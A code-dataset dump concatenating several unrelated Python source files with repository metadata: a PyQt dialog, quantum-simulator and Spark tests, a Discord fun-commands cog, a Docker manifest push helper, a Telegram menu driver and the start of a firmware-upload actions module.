self.gridLayout_2.addWidget(self.ButtonBrowseWorkingDir, 0, 1, 1, 1)
self.gridLayout_5.addWidget(self.groupBoxWorkspace, 0, 0, 1, 1)
self.groupBoxPlugins = QtWidgets.QGroupBox(self.scrollAreaWidgetContents)
self.groupBoxPlugins.setObjectName("groupBoxPlugins")
self.formLayout = QtWidgets.QFormLayout(self.groupBoxPlugins)
self.formLayout.setObjectName("formLayout")
self.pushButtonPlugins = QtWidgets.QPushButton(self.groupBoxPlugins)
self.pushButtonPlugins.setObjectName("pushButtonPlugins")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.SpanningRole, self.pushButtonPlugins)
self.gridLayout_5.addWidget(self.groupBoxPlugins, 1, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout_3.addWidget(self.scrollArea, 0, 0, 1, 1)
self.retranslateUi(DialogPreferences)
self.pushButtonCancel.clicked.connect(DialogPreferences.reject)
self.pushButtonAccept.clicked.connect(DialogPreferences.accept)
QtCore.QMetaObject.connectSlotsByName(DialogPreferences)
def retranslateUi(self, DialogPreferences):
_translate = QtCore.QCoreApplication.translate
DialogPreferences.setWindowTitle(_translate("DialogPreferences", "Meggie - Preferences"))
self.pushButtonCancel.setText(_translate("DialogPreferences", "Cancel"))
self.pushButtonAccept.setText(_translate("DialogPreferences", "Ok"))
self.groupBoxMisc.setTitle(_translate("DialogPreferences", "Miscellaneous:"))
self.checkBoxAutomaticOpenPreviousExperiment.setText(_translate("DialogPreferences", "Automatically open previous experiment upon application startup"))
self.groupBoxWorkspace.setTitle(_translate("DialogPreferences", "Workspace:"))
self.ButtonBrowseWorkingDir.setText(_translate("DialogPreferences", "Browse..."))
self.groupBoxPlugins.setTitle(_translate("DialogPreferences", "Plugins:"))
self.pushButtonPlugins.setText(_translate("DialogPreferences", "Select active plugins..."))
| 62.616279 | 160 | 0.758774 |
abb2466001716bd862791946936f478b4e0f91ce | 787 | py | Python | tests/test_measuring_from_threads.py | tqsd/EQSN_python | 823a315b1c2f5658cded19d8c97e579ce7285c42 | [
"MIT"
] | 3 | 2020-05-03T15:09:41.000Z | 2021-12-17T11:26:34.000Z | tests/test_measuring_from_threads.py | tqsd/EQSN_python | 823a315b1c2f5658cded19d8c97e579ce7285c42 | [
"MIT"
] | 5 | 2020-03-13T10:03:39.000Z | 2020-07-09T12:56:04.000Z | tests/test_measuring_from_threads.py | tqsd/EQSN_python | 823a315b1c2f5658cded19d8c97e579ce7285c42 | [
"MIT"
] | 1 | 2020-05-03T15:06:24.000Z | 2020-05-03T15:06:24.000Z | import threading
import random
import time
from eqsn import EQSN
def test_measure_from_threads():
q_sim = EQSN()
def measure_or_hadamard(_id):
n = random.randrange(10, 20, 1)
for _ in range(n):
time.sleep(0.1)
q_sim.H_gate(_id)
nr_threads = 10
ids = [str(x) for x in range(nr_threads)]
for _id in ids:
q_sim.new_qubit(_id)
id1 = ids[0]
for c in ids:
if c != id1:
q_sim.cnot_gate(id1, c)
thread_list = []
for _id in ids:
t = threading.Thread(target=measure_or_hadamard, args=(_id,))
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
q_sim.stop_all()
if __name__ == "__main__":
test_measure_from_threads()
exit(0)
| 19.195122 | 69 | 0.584498 |
abb2d80690576788c51726bbb153b052e20309fe | 1,464 | py | Python | _tests/test_permute_columns.py | allisonCYWu/utility_functions | d2c6246c96b9cd5e8c01292dd38ab0d572971698 | [
"Apache-2.0"
] | null | null | null | _tests/test_permute_columns.py | allisonCYWu/utility_functions | d2c6246c96b9cd5e8c01292dd38ab0d572971698 | [
"Apache-2.0"
] | 4 | 2019-11-18T13:24:08.000Z | 2020-02-05T19:49:59.000Z | _tests/test_permute_columns.py | allisonCYWu/utility_functions | d2c6246c96b9cd5e8c01292dd38ab0d572971698 | [
"Apache-2.0"
] | null | null | null | import unittest
from unittest import TestCase
from utility_functions.stats_functions import permute_columns
from utility_functions.databricks_uf import has_column
from connect2Databricks.spark_init import spark_init
if 'spark' not in locals():
spark, sqlContext, setting = spark_init()
sc = spark.sparkContext
class TestPermuteColumns(TestCase):
def test_permute_columns(self):
data = spark.createDataFrame([(1, 'a', 'a'),
(2, 'b', 'b'),
(3, 'c', 'c'),
(4, 'd', 'd'),
(5, 'e', 'e')],
['id', 'col1', 'col2'])
permuted_data = permute_columns(data,
columns_to_permute = ['col1', 'col2'],
column_to_order = 'id',
ind_permute = False)
permuted_data.show()
self.assertTrue(has_column(permuted_data, 'rand_id'))
self.assertTrue(has_column(permuted_data, 'rand_col1'))
self.assertTrue(has_column(permuted_data, 'rand_col2'))
self.assertEqual(permuted_data.select('rand_col1').collect(), permuted_data.select('rand_col2').collect())
self.assertNotEqual(permuted_data.select('col1').collect(), permuted_data.select('rand_col1').collect())
if __name__ == '__main__':
unittest.main()
| 40.666667 | 114 | 0.555328 |
abb442950c4d7f407a450c76baca3bbbde03c64f | 24,857 | py | Python | cogs/fun.py | ZetDude/KalevBot | fcf8c1502d3d9c85917ca151f9fb2cf4f3713086 | [
"MIT"
] | 3 | 2017-10-28T21:07:58.000Z | 2018-05-05T12:14:05.000Z | cogs/fun.py | ZetDude/KalevBot | fcf8c1502d3d9c85917ca151f9fb2cf4f3713086 | [
"MIT"
] | 4 | 2017-09-08T17:44:31.000Z | 2017-10-09T15:10:23.000Z | cogs/fun.py | ZetDude/KalevBot | fcf8c1502d3d9c85917ca151f9fb2cf4f3713086 | [
"MIT"
] | 4 | 2017-09-03T15:37:47.000Z | 2017-11-15T20:15:59.000Z | """Fun commands that don't do anything really productive
night, thank, shipname, shipcount, ship, hug, pecan, fortune"""
# -*- coding: utf-8 -*-
import pickle
import random
import sqlite3 as lite
import subprocess
import discord
from discord.ext import commands
from lib import shipname_module as improved_shipname, customconverter as cconv, obot
def search(values, search_for):
"Finds all the values in dict `values` where `search_for` is somewhere in the key"
found_values = [] # Initialize an empty list that will be the final list.
for k in values: # Iterate through every key in the given dictionary.
value_string = str(values[k]) # The corresponding value for the key we are currently on.
if str(search_for) in str(k): # If the string we are looking for is in the key.
found_values.append([k, value_string])
# Append the value and the key to the final list.
return found_values # Return the final list.
def remove_duplicates(values):
"Return the list `values` with duplicates removed"
# I'm going to be honest, I just found this on StackOverflow so I have no idea how it works.
seen = set()
seen_add = seen.add
values = [x for x in values if not (x in seen or seen_add(x))]
return values
class FunCog():
"fun fun fun fun fun fun"
def __init__(self, bot):
self.bot = bot
type(self).__name__ = "Fun"
@commands.command(name='night', aliases=['n', 'goodnight', 'nacht', 'öö', 'ööd', 'oyasumi',
'\u304a\u3084\u3059\u307f'],
help=(r"Wish someone a good night using a super cute kaomoji! ^_^"),
brief="Wish someone a good night.")
async def night(self, ctx, *, target_user=None):
"""Wish a good night to `target_user`, with a kaomoji emoticon in front.
`target_user` is anything pertaining to the target user or member that
lib.customconverter.HybridConverter can detect.
`target_user` defaults to None and can be left blank.
`target_user` can also be the argument "-list", in which case the bot returns all the
kaomoji emoticons associated with this command.
"""
# Define the list of kaomoji emoticons the bot will be using. Because of discord formatting
# special characters are escaped with a \.
kaomoji = [r"お(^o^)や(^O^)す(^。^)みぃ(^-^)ノ゙",
r" .。.:\*・゚☆Goodヾ(\*´Д`(\*゚ω゚\* )Night☆.。.:\*・゚",
r" – =͟͟͞ (¦3[▓▓])",
r" 。・:\*:・゚★,。・=^∇^\*=,。・:\*:・゚☆",
r"☆~\*.(UωU\*)おやすみぃ…\*~☆",
r"|・ω・`)おやすみぃ♪", ]
selected_kaomoji = random.choice(kaomoji)
if target_user is None: # If the user does not supply a target user...
await ctx.send(f"{selected_kaomoji} Good night!") # Return a generic response.
elif target_user == "-list": # -list flag...
await ctx.send("\n".join(kaomoji)) # Join together all the kaomoji and send them.
else: # If the target user is actually given.
try:
target_user = await cconv.HybridConverter().convert(ctx, target_user)
await ctx.send(f"{selected_kaomoji} Good night, {target_user.name}!")
except commands.BadArgument: # HybridConverter fails...
# Fall back to just using the inputted string with no conversion.
await ctx.send(f"{selected_kaomoji} Good night, {target_user}!")
@commands.command(name='thank', aliases=['thanks', 'arigato', 'arigatou', 'arigatoo',
'merci', 'arigatō', 'danke', 'aitah', 'aitäh',
'\u3042\u308a\u304c\u3068\u3046'],
help=(r"Thank someone using a super cute kaomoji! ^_^"),
brief="Thank someone.")
async def thank(self, ctx, *, target_user=None):
"""Thank `target_user`, with a kaomoji emoticon in front.
`target_user` is anything pertaining to the target user or member that
lib.customconverter.HybridConverter can detect.
`target_user` defaults to None and can be left blank.
`target_user` can also be the argument "-list", in which case the bot returns all the
kaomoji emoticons associated with this command.
"""
# The list of kaomoji emoticons the bot will be using. Because of discord formatting special
# characters are escaped with a \.
kaomoji = [r"♪(・ω・)ノ",
r"(\*ゝω・)ノ",
r"゚・:,。★\(^-^ )♪ありがとう♪( ^-^)/★,。・:・゚",
r"(★^O^★)",
r"☆\*:.。. o(≧▽≦)o .。.:\*☆",
r"(ノ^_^)ノ",
r"(ノ゚▽゚)ノ",
r"(ノ´ヮ´)ノ\*:・゚✧",
r"(\*^3^)/\~☆",
r"<(\_ \_\*)> アリガトォ",
r"ありがとぅございますっっヽ(●´∀\`)人(´∀\`●)ノ",
r"ありがとうございましたm(\*-ω-)m",
r"+。:.゚ヽ(\*´∀)ノ゚.:。+゚ァリガトゥ"
]
selected_kaomoji = random.choice(kaomoji)
if target_user is None: # If the user does not supply a target user.
await ctx.send(f"{selected_kaomoji} Thank you!") # Return a generic response.
elif target_user == "-list": # -list flag
await ctx.send("\n".join(kaomoji)) # Join together all the kaomoji and send them.
else: # If the target user is actually given.
try:
target_user = await cconv.HybridConverter().convert(ctx, target_user)
if target_user == ctx.bot.user: # If the user's target is the bot itself...
# "u2764" is the black heart unicode character
await ctx.send(f"You're welcome, {ctx.author.name}! \\\u2764")
elif target_user == ctx.author: # If the user attempts to thank themself... sass.
await ctx.send(f"Why would I need to thank you, {ctx.author.name}?")
else: # If no special cases were found...
await ctx.send(f"{selected_kaomoji} Thank you, {target_user.name}!")
except commands.BadArgument: # HybridConverter fails...
# Fall back to just using the inputted string with no conversion
await ctx.send(f"{selected_kaomoji} Thank you, {target_user}!")
@commands.command(name='shipname', aliases=['name'],
help="Create the shipname of two people.")
async def shipname(self, ctx, name1, name2):
"""Uses pecan's shipname module to create the shipname of two names.
`name1` is the first name.
`name2` is the first name.
"""
# Request a shipname from pecan's shipname module™ using names from arguments.
names_shipname = improved_shipname.shipname(name1, name2) # I don't know how it works.
await ctx.send(f"{ctx.author.name}, I shall call it \"**{names_shipname}**\"!")
@commands.command(name='shipcount', aliases=['count'],
help="Get amount of ships created between people",
usage="[users...] OR -top")
async def shipcount(self, ctx, *ships_in):
"""Show all the people someone has been shipped with when given one person, or the amount
of ships between certain people when given multiple.
`ships_in` is the people/person to get info of.
`ships_in` can also be the argument "-top", in which case only the top 10 most shipped pairs
will be shown."""
shipfile = obot.SHIPFILE # File where all shipping information is stored.
ships = [] # This list will contain the user(s) we want to get information about.
for i in ships_in: # Convert all the given member to actual users.
if i == "-top": # skip the -top flag.
continue
ships.append(await cconv.HybridConverter().convert(ctx, i))
ships = remove_duplicates(ships)
# Format the IDs into a format: 'id1:id2:id3...'.
# This format is needed as this is how ship information is stored in the shipfile.
ships_format = ':'.join([str(x.id) for x in ships])
try:
# Open the shipfile and unpickle it. The returning format is a dictionary.
# -> {'id1:id2:id3...': count}
with open(shipfile, "rb") as opened_file:
lines = pickle.load(opened_file)
except FileNotFoundError:
await ctx.send(f"I couldn't find the shipping file ({shipfile})")
return
except pickle.UnpicklingError:
await ctx.send("Shipping data file is corrupt, cannot fetch data.")
return
if not ships: # No arguments... default to author.
ships = [ctx.author]
if len(ships) == 1: # Find all the ships that user is contained in.
return_message = ""
if "-top" in ships_in: # -top flag is given...
# The data dict is turned into a list, and is sorted by the count, then reversed
# so that the biggest are in the beginning, and then only the first 10 are fetched.
mentions = list(reversed(sorted(list(lines.items()), key=lambda a: a[1])))[:10]
else: # no flag is given...
# All the lines that contain the target are fetched
mentions = search(lines, ships[0].id)
mentions = reversed(sorted(mentions, key=lambda a: a[1]))
for k, j in mentions: # Iterate through all fetched lines.
usern = []
# take the 'id1:id2:id3...' format and split it into the IDs it is composed from.
for i in k.split(":"):
try:
# Convert the ID which is stored into an user.
found_user = ctx.bot.get_user(int(i))
if found_user is None: # No server shared with target user.
# NOTE: The function get_user_info() works regardless of the target
# sharing servers with the bot, however, it is terribly slow.
found_user = await ctx.bot.get_user_info(i)
usern.append(found_user.name)
except discord.NotFound: # User doesn't exist on discord...?
usern.append(i) # Fall back to just showing the ID
times_message = "time" if j == 1 else "times"
return_message += f"{' x '.join(usern)}: shipped {j} {times_message}\n"
# example -> "User1 x User2: shipped 3 times"
if not return_message: # no results found...
return_message = (f"{ships[0].name}, you haven't been shipped with anybody yet, "
f"but I still love you!")
await ctx.send(f"```\n{return_message}\n```")
return
else: # The user gives multple users as arguments...
# Find how many times those specific users have been shipped before.
occ = lines.get(ships_format, 0)
times_message = "time" if j == 1 else "times"
await ctx.send(f"{ctx.author}, they have been shipped {occ} {times_message} before")
@commands.command(name='ship', aliases=['otp'],
help="Ship someone with someone else.",
brief="Ship someone with someone else. uwu")
async def ship(self, ctx, *ships: cconv.HybridConverter):
shipfile = obot.SHIPFILE # File where all the shipping information is stored.
if ctx.message.author in ships: # Uses attempts to ship themself
await ctx.send((f"{ctx.message.author.name}, "
"I don't think you can ship yourself with someone"))
return
ships = remove_duplicates(ships)
if len(ships) < 2:
await ctx.send(f"{ctx.message.author.name}, mention at least two people in the message")
return
ships_names = [x.name for x in ships]
# Format the IDs into a format: 'id1:id2:id3...'.
# This format is needed as this is how ship information is stored in the shipfile.
# The list is sorted by ID for consistency between runs.
ships_format = ":".join(sorted([str(x.id) for x in ships], key=int))
try:
with open(shipfile, "rb") as opened_file:
# Open the shipfile and unpickle it. The returning format is a dictionary.
# -> {'id1:id2:id3...': count}
lines = pickle.loads(opened_file.read())
except FileNotFoundError:
lines = {}
with open(shipfile, 'w'):
await ctx.send("Created new ship file")
except pickle.UnpicklingError:
await ctx.send("Ship file is corrupt, cannot fetch data.")
return
occ = lines.get(ships_format, 0) # Times the target users have already been shipped.
times_message = "time" + ("" if occ == 1 else "s")
lines[ships_format] = occ + 1 # Increase count by one
with open(shipfile, 'wb') as opened_file: # Write the new data
pickle.dump(lines, opened_file)
shipname = ""
if len(ships) == 2: # If there are two names, we can make a shipname
# Request a shipname from pecan's shipname module™
final = improved_shipname.shipname(*ships_names)
shipname = "I shall call it \"**" + final + "**\""
await ctx.send((f"{ctx.message.author.name} totally ships {' and '.join(ships_names)}"
f"\nThey have been shipped {occ} {times_message} before"
f"\n{shipname}"))
@commands.command(name='hug', aliases=['\U0001f917'],
help="Give someone a hug!")
async def hug(self, ctx, *target_users):
"""Hug target user, and count how many times you have hugged people in total
TODO: Make hugs server-based
`target_users` are the users to hug (or just 1 user).
`target_users` can also be the argument "-top <num>", in which case the top <num> people
with the highest amount of hugs given will be returned.
"""
target_users = list(target_users)
con = lite.connect("important/data.db") # Database where hug data is stored
if target_users[0] == "-top": # If the first argument given is the flag -top...
try: # The second argument is how many people to fetch.
fetch_amount = int(target_users[1])
if fetch_amount < 0:
await ctx.send(f"That's less than zero, {ctx.author}.")
except ValueError:
await ctx.send(f"That's not an integer, {ctx.author}.")
return
except IndexError: # If an amount isn't given, default to 5
fetch_amount = 5
with con:
try:
# Order all entries by amount, descending, then get the first `fetch_amount`
cur = con.cursor()
cur.execute("SELECT * FROM Hug ORDER BY Hugs DESC")
rows = cur.fetchall()[:fetch_amount]
combine = f"```\nTOP {fetch_amount} HUGGERS:\n---------\n"
for row in rows:
# Convert the ID to an user.
target_user = ctx.bot.get_user(row[0])
if target_user is None: # No server shared with target.
try:
# NOTE: The function get_user_info() works regardless of the target
# sharing servers with the bot, however, it is terribly slow.
target_user = await ctx.bot.get_user_info(row[0])
except discord.NotFound: # User doesn't exist on Discord.
target_user = None # Give up and default to None.
combine += target_user.name if not None else row[0]
combine += " - " + str(row[1]) + "\n"
combine += "\n```"
except lite.OperationalError as err: # sql error...
if str(err) == "no such table: Hug": # No table exists...
# Create a new one and inform the user
cur.execute("CREATE TABLE Hug(id INT NOT NULL UNIQUE, Hugs INT);")
await ctx.send("No hug data was recorded, created file now.")
else: # If actual users are given.
targets = []
for i in target_users: # Go through all the targets...
try: # and try to convert them using HybridConverter...
converted_member = await cconv.HybridConverter().convert(ctx, i)
except commands.BadArgument: # but if that fails...
converted_member = "*" + i + "*" # default to the string that the user gave.
targets.append(converted_member)
targets = remove_duplicates(targets)
# If the list contains just the author or nobody
if [ctx.author] == targets or not targets:
await ctx.send(f"Who are you going to hug, {ctx.author.name}? Yourself?")
return
if ctx.author in targets: # Remove the user from the list of targets.
targets.remove(ctx.author)
with con:
try: # Get the data of the author from the database
cur = con.cursor()
cur.execute(
"SELECT COALESCE(Hugs, 0) FROM Hug WHERE id = ?", (ctx.author.id, ))
row = cur.fetchone()
hugs = 0 if row is None else row[0]
except lite.OperationalError as err:
if str(err) == "no such table: Hug":
cur.execute(
"CREATE TABLE Hug(id INT NOT NULL UNIQUE, Hugs INT);")
await ctx.send("Created new hugs database table.")
hugs = 0
times_message = "hug" + ("" if hugs == 1 else "s")
# Create a second list which is just a copy of the targets
mentions_without_bot = list(targets)
for user in mentions_without_bot[::1]:
# Need to iterate backwards to not jump over anything when removing.
if isinstance(user, str): # Get rid of everything that isn't an user.
mentions_without_bot.remove(user)
elif user.bot: # Get rid of bots.
mentions_without_bot.remove(user)
hugs += len(mentions_without_bot) # Increase the hug tally of the author.
# Update database.
cur.execute("INSERT OR IGNORE INTO Hug VALUES(?, ?)", (ctx.author.id, hugs))
cur.execute("UPDATE Hug SET Hugs=? WHERE id=?", (hugs, ctx.author.id))
if ctx.bot.user.id in [x.id for x in targets if not isinstance(x, str)]:
# If the bot itself is in the targets list.
if len(targets) > 1: # If other users are hugged alongside it.
# Join all other targets.
recievers_without_self = list(targets)
recievers_without_self.remove(ctx.bot.user)
recievers = " and ".join([x.name if not isinstance(
x, str) else x for x in recievers_without_self])
combine = (f"{ctx.author.name} gave {recievers} a hug, and I hug you back! "
f"\U0001f917 (+{len(mentions_without_bot)}; {hugs} "
f"{times_message} in total)")
else: # Only the bot is hugged.
combine = (f"I hug you back, {ctx.author.name}! "
f"\U0001f917 (+{len(mentions_without_bot)}; {hugs} "
f"{times_message} in total)")
elif targets:
# Join all targets.
recievers = " and ".join(
[x.name if not isinstance(x, str) else x for x in targets])
combine = (f"{ctx.author.name} gave {recievers} a hug! "
f"(+{len(mentions_without_bot)}; {hugs} "
f"{times_message} in total)")
else: # I don't know if this clause if ever executed but I'm too scared to remove it.
combine = (f"{ctx.author.name}, you've hit the else clause on line 381 of fun.py, "
f"please report it to someone.")
await ctx.send(combine)
@commands.command(name='pecan', aliases=['p'],
help="Random quote from pecan.")
async def pecan(self, ctx, *, input_text=None):
"""Get a random or certain line from the old IRC chat logs of pecan.
`input_text` is the integer code of the line to fetch. Lookup is 1-indexed.
`input_text` can also be left empty, in which case it defaults to None and just gives a
random line.
`input_text` can also be a string, in which case that string is searched for in the corpus,
and a random line containing that string is returned.
"""
try:
with open(obot.PECAN_CORPUS, "r") as opened_file:
data = opened_file.read().splitlines() # Get all the lines of the file
if input_text is None: # No argument given
num = random.choice(range(len(data))) # Get a random number.
quote = data[num] # Get the quote corresponding to that number
await ctx.send(f"{num + 1}: `{quote}`")
else: # An argument is given
try: # Test if is the number for a certain line
num = int(input_text)
num = num - 1
if num < 0:
await ctx.send("baka! number is negative!")
return
elif num == 0:
await ctx.send("baka! file is 1-indexed!")
return
quote = data[num]
except IndexError:
await ctx.send(f"baka! number is over {len(data)}!")
return
except ValueError: # Not an int
# Find all entries where target string is included.
if input_text.startswith('"') and input_text.endswith('"'):
input_text = input_text[1:-1]
found_entries = []
for j, i in enumerate(data):
if input_text.lower() in i.lower(): # case-insensitive
found_entries.append((j, i))
if not found_entries: # No entries found...
await ctx.send(f"{ctx.author.name}, nothing contains `{input_text}`")
return
response = random.choice(found_entries) # pick a random valid entry.
await ctx.send((f"`{input_text}` (total {len(found_entries)}) - "
f"{response[0]+1}: `{response[1]}`"))
# example -> `pecan` (total 40) - 1813: `I might meet the other pecan.`
except FileNotFoundError:
await ctx.send(f"{ctx.author.name}, no pecan corpus file is included or it is "
f"configured incorrectly. Download it at "
f"<http://97.107.129.215/pecan.txt>")
@commands.command(name='fortune', aliases=['f'],
help="Unix fortune.")
async def fortune(self, ctx):
"Return a random unix fortune line."
fortune_msg = subprocess.check_output("fortune").decode("utf-8")
fortune_msg = fortune_msg[:1988] + "\u2026" if len(fortune_msg) > 1990 else fortune_msg
await ctx.send("```\n" + fortune_msg + "\n```")
@shipname.error
async def shipname_error(self, ctx, error):
if isinstance(error, commands.MissingRequiredArgument):
await ctx.send(f"{ctx.author.name}, please use two names as arguments")
@shipcount.error
@ship.error
async def ship_error(self, ctx, error):
if isinstance(error, commands.BadArgument):
await ctx.send(f"{ctx.author.name}, {error.args[0]}")
def setup(bot):
bot.add_cog(FunCog(bot))
| 53.80303 | 100 | 0.544796 |
abb5b6a5115ed18e2c351f8835ee0c1d15acd865 | 3,151 | py | Python | kross/base_push.py | pcorbel/kross | b7c282ecefc24066c3623257407b2f4ad02964bf | [
"Apache-2.0"
] | 7 | 2019-07-16T19:10:57.000Z | 2019-07-29T07:50:39.000Z | kross/base_push.py | pcorbel/kross | b7c282ecefc24066c3623257407b2f4ad02964bf | [
"Apache-2.0"
] | null | null | null | kross/base_push.py | pcorbel/kross | b7c282ecefc24066c3623257407b2f4ad02964bf | [
"Apache-2.0"
] | null | null | null | import os
import re
import shutil
import attr
import click
import subprocess32 as subprocess
import yaml
from kross.utils import echo, get_std
@attr.s
class BasePush(object):
push_args = attr.ib(type=tuple)
registry_target = attr.ib()
manifest_directory = attr.ib()
qemu_archs = attr.ib()
push_manifest_cmd = attr.ib()
@registry_target.default
def default_registry_target(self):
registry_target = self.push_args[-1]
if re.match(r"(.*?)/(.*?):(.*)", registry_target):
return registry_target
# fmt: off
raise click.ClickException("""Cannot find target image.
Please pass it in the <repository/image_name:image_tag> format.""")
# fmt: on
@manifest_directory.default
def default_manifest_directory(self):
# Generic registry handling
manifest_directory = "{}/.docker/manifests/{}".format(
os.path.expanduser("~"),
self.registry_target.replace("/", "_").replace(":", "-"),
)
if os.path.exists(manifest_directory):
return manifest_directory
# Default non-explicit registry handling
else:
manifest_directory = "{}/.docker/manifests/docker.io_{}".format(
os.path.expanduser("~"),
self.registry_target.replace("/", "_").replace(":", "-"),
)
if os.path.exists(manifest_directory):
return manifest_directory
@qemu_archs.default
def default_qemu_archs(self): # pylint: disable=no-self-use
arch_file = os.path.dirname(os.path.abspath(__file__)) + "/archs.yaml"
with click.open_file(arch_file, "r") as stream:
archs = yaml.load(stream=stream, Loader=yaml.UnsafeLoader)
return archs.get("archs")
@push_manifest_cmd.default
def default_push_manifest_cmd(self):
push_manifest_cmd = "docker manifest push {}".format(self.registry_target)
return push_manifest_cmd
def remove_manifest_directory(self):
echo("Purging manifest directory.", verbose_only=True)
shutil.rmtree(path=self.manifest_directory, ignore_errors=True)
def exec_push_manifest(self):
try:
subprocess.run(
self.push_manifest_cmd.split(),
check=True,
stdout=get_std(),
stderr=get_std(),
)
except subprocess.CalledProcessError:
raise click.ClickException("Cannot push manifest list to registry.")
def __str__(self):
# fmt: off
result = """
base_push:
- registry_target: {self.registry_target}
- manifest_directory: {self.manifest_directory}
- push_manifest_cmd: {self.push_manifest_cmd}
- push_args: """.format(**locals())
for push_arg in self.push_args:
result += "{} ".format(push_arg)
result += """
- qemu_archs: """
for arch in self.qemu_archs:
result += "{name} ".format(**arch)
result += "\n"
return result
# fmt: on
| 33.521277 | 83 | 0.597271 |
abb63be3752095ce741f646a1eeb76e388b01a69 | 5,655 | py | Python | pylogue/menu_driver.py | tirinox/pylogue | 35b85f93a0d91b60a0d1640126b54d427b60712a | [
"MIT"
] | null | null | null | pylogue/menu_driver.py | tirinox/pylogue | 35b85f93a0d91b60a0d1640126b54d427b60712a | [
"MIT"
] | null | null | null | pylogue/menu_driver.py | tirinox/pylogue | 35b85f93a0d91b60a0d1640126b54d427b60712a | [
"MIT"
] | null | null | null | from comm.telegram import TelegramCommunicationBot
from telegram import Message
from util.misc import wlog, die, enumerate_2d_array
import traceback
class MessageResponse:
def __init__(self, text, user_id):
self.user_id = user_id
self.text = str(text).strip()
class MessageRequest:
pass
class MenuOption:
def __init__(self, caption, key=None):
self.caption = caption
self.key = key
class BotMenuBase:
def root_generator(self):
yield from ()
def __init__(self, bot: TelegramCommunicationBot):
self.bot = bot
self.user_id = None
self.next_message = None
self.buffer = []
self.last_options = []
self.last_hide_kb = False
self.last_is_kbd_compact = False
def flush(self):
if self.buffer:
full_message = '\n\n'.join(self.buffer)
self.bot.send_message(user_id=self.user_id,
message=full_message,
hide_keyboard=self.last_hide_kb,
options=self.last_options,
resize_keyboard=self.last_is_kbd_compact)
self.buffer = []
def notify(self, text, hide_kb=False, options=list(), flush=False, compact_kbd=False):
if self.user_id and text:
self.last_hide_kb = hide_kb
self.last_options = options
self.last_is_kbd_compact = compact_kbd
self.buffer.append(text)
if flush or len(self.buffer) >= 4:
self.flush()
else:
wlog("Warning: can't notify; you need set user_id and send a valid text")
def notify_error(self, text):
self.notify('{}\nType /quit or /q if you give up.'.format(text), flush=True)
def set_next_message(self, msg: MessageRequest):
self.next_message = msg
def stop(self):
raise StopIteration
def gen_ask_until_validated(self, validator, text_on_fail='Try again.'):
while True:
r = yield MessageRequest()
text = r.text
if text in ['/quit', '/q']:
self.notify('😤 Dialog stopped.')
self.stop()
return None
value = validator(text)
if value is None:
if text_on_fail:
self.notify_error(text_on_fail)
else:
return value
def gen_confirm(self, request_text: str, yes_option='Yes, I confirm', no_option='No, cancel please'):
text = '🤝 Do you confirm this operation❓\n{}'.format(request_text)
result = yield from self.gen_select_option(text, [
MenuOption('✅ {}'.format(yes_option), 'yes'),
MenuOption('🚫 {}'.format(no_option), 'no')
])
return result == 'yes'
def gen_select_option(self, request_text: str, options: list, compact_kbd=True) -> [str, int]:
key_table = {}
n_options = 0
def extract_string_for_keyboard(item, index):
if isinstance(item, MenuOption):
text = item.caption
key = item.key if item.key else index
else:
return 'error: each item must be a MenuOption instance'
caption = '{}. {}'.format(index, text)
key_table[str(index)] = key
key_table[text] = key
key_table[caption] = key
key_table[key] = key
nonlocal n_options
n_options += 1
return caption
keyboard_numbered = enumerate_2d_array(options, 1, extract_string_for_keyboard)
if n_options == 0: # no options provided
self.stop()
return ''
message_text = request_text
while True:
self.notify(message_text, options=keyboard_numbered, compact_kbd=compact_kbd)
self.flush()
answer = yield MessageRequest()
answer_text = str(answer.text).strip()
if answer_text in ['/quit', '0', 'q']:
self.notify('😤 Dialog stopped.')
self.stop()
return ''
else:
if answer_text in key_table:
return key_table[answer_text]
else:
message_text = '😡 Please select a valid option or send a number ' \
'between 1 and {n}. Use /quit or 0 or q to exit. {orig_text}'.format(
orig_text=request_text,
n=n_options)
class BotMenuDriver:
def set_user_id(self, user_id):
self.menu.user_id = user_id
def on_message(self, msg: Message):
try:
user_id = self.bot.user_id_from_msg(msg)
self.set_user_id(user_id)
text = msg.text
self.gen.send(MessageResponse(text, user_id))
except StopIteration:
wlog('Restarting menu generator.')
self.start_generator()
except Exception as e:
wlog('Menu exception: {}'.format(e))
traceback.print_exc()
def start_generator(self):
self.gen = self.menu.root_generator()
try:
next(self.gen)
except:
wlog("Error! Couldn't start the menu generator")
def attach_to_bot(self, bot: TelegramCommunicationBot):
self.bot = bot
self.bot.message_handler = self.on_message
self.set_user_id(bot.get_allowed_chat())
self.start_generator()
def __init__(self, menu: BotMenuBase):
self.bot = None
self.menu = menu
self.gen = None | 32.687861 | 105 | 0.561804 |
abb674cdfb0957870cdb52790ce97f51c0c2b5eb | 10,358 | py | Python | hiburn/actions.py | OpenHisiIpCam/hiburn | 71d8ab3c5a87401a60cf125d441e25f8b7d3282c | [
"MIT"
] | 8 | 2020-04-06T08:47:26.000Z | 2021-02-23T17:10:12.000Z | hiburn/actions.py | OpenHisiIpCam/hiburn | 71d8ab3c5a87401a60cf125d441e25f8b7d3282c | [
"MIT"
] | 2 | 2020-05-14T16:59:33.000Z | 2021-06-19T23:48:35.000Z | hiburn/actions.py | OpenHisiIpCam/hiburn | 71d8ab3c5a87401a60cf125d441e25f8b7d3282c | [
"MIT"
] | 2 | 2020-05-02T22:49:01.000Z | 2020-05-12T02:39:26.000Z | import logging
import ipaddress
import os
from . import utils
from . import ymodem
# -------------------------------------------------------------------------------------------------
class Action:
@classmethod
def _run(cls, client, config, args):
return cls(client, config).run(args)
def __init__(self, client, config):
self.client = client
self.config = config
@classmethod
def add_arguments(cls, parser):
pass
def run(self, args):
raise NotImplementedError()
# some helper methods are below
@property
def host_ip(self):
return ipaddress.ip_interface(self.config["net"]["host_ip_mask"]).ip
@property
def host_netmask(self):
return ipaddress.ip_interface(self.config["net"]["host_ip_mask"]).netmask
@property
def device_ip(self):
return ipaddress.ip_address(self.config["net"]["device_ip"])
def configure_network(self):
""" Common method to configure network on target device
"""
self.client.setenv(
ipaddr=self.device_ip,
serverip=self.host_ip,
netmask=self.host_netmask
)
def upload_files(self, *args):
utils.upload_files_via_tftp(self.client, args, listen_ip=str(self.host_ip))
def upload_y_files(self, *args):
for fname, addr in args:
with open(fname, "rb") as f:
data = f.read()
self.client.loady(addr, data)
def add_actions(parser, *actions):
subparsers = parser.add_subparsers(title="Action")
for action in actions:
action_parser = subparsers.add_parser(action.__name__,
help=action.__doc__.strip() if action.__doc__ else None
)
